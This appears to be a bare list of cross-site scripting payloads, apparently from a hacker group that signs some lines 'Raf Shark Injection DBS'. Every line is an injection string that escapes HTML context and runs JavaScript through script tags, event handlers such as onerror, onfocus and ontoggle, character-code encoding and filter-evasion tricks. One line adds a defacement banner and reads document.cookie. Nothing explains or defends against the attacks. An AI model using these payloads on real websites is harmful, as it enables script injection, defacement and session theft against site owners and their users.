"><font color=red>Raf Shark Injection DBS</font><iframe src=a  onload=alert("Raf Shark Injection DBS") <c ">

<body onload=alert(/XSS/.source)>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><img src="x" onerror=alert(document.domain)>
"></></td></tr></tbody><h1>Website with Low Security</H1><script>alert('By RSI - DBS')</script><script>alert(document.cookie)</script>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
